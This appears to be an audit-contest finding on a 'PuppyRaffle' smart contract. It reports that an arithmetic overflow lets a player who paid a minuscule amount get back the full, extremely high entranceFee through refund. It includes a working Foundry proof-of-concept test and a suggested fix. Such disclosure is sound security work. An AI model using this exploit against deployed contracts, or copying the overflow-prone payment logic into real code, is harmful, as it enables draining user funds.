'refund' can refund higher value than entered
Summary
'refund' can refund higher value than entered in extreme case
Vulnerability Details
In the case where the 'entranceFee' is extremely high, and address can enter the raffle sending miniscule value and appropriate number of addresses (causing overflow), the refund would actually send the extremely high value of the entranceFee.
-
Initialize the contract with extremely high entranceFee : uint256 entranceFee = type(uint256).max / 3 + 1;
-
Run this test. It passes and the balances are logged on the console:
function testCanRefundMoreThanDepositedExtreme() public {
console.log("entranceFee : %s", entranceFee);address BIGplayer = address(15); address[] memory bigPlayers = new address[](1); bigPlayers[0] = BIGplayer; vm.deal(BIGplayer, type(uint256).max); vm.prank(BIGplayer); puppyRaffle.enterRaffle{value: entranceFee}(bigPlayers); assertEq(puppyRaffle.players(0), BIGplayer); address[] memory players = new address[](3); players[0] = playerOne; players[1] = playerTwo; players[2] = playerThree; puppyRaffle.enterRaffle{value: 2}(players); assertEq(puppyRaffle.players(1), playerOne); console.log("Balance before : %s", playerOne.balance); vm.prank(playerOne); puppyRaffle.refund(1); console.log("Balance after : %s", playerOne.balance);}
Impact
The contract can be drained of its resources
Tools Used
Manual review
Recommendations
Keep track of exactly what amount of value every address contributes and refund that amount. Better yet remove the 'refund' function.
Lead Judging Commences
weak-randomness
Root cause: bad RNG Impact: manipulate winner
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.